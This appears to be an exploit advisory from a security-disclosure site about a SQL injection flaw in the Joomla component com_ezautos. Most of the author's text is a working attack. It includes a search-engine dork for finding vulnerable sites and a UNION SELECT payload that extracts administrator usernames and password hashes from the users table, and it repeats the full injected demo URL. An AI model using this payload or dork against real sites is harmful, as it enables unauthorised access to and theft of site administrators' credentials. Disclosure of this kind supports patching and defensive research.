The Joomla EZ Autos component remote SQL injection vulnerability

2010.09.23
Credit: Gamoscu
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:com_ezautos

Joomla (joostina) Component com_ezautos SQL Injection Vulnerability ########################### Author : Gamoscu Homepage : http://www.1923turk.com Blog :http://gamoscu.wordpress.com/ Script : Joomla http://www.joostina-cms.org/content/view/20/35/ Dork : inurl:com_ezautos ########################### [ Vulnerable File ] index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ] [ XpL ] +and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1-- [ Demo] http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1-- ############################################################## # # # # Baybora: http://baybora.wordpress.com/ # # Manas58 Delibey Tiamo Psiko Turco infazci X-TRO # # # # #Elektrikist# # #############################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top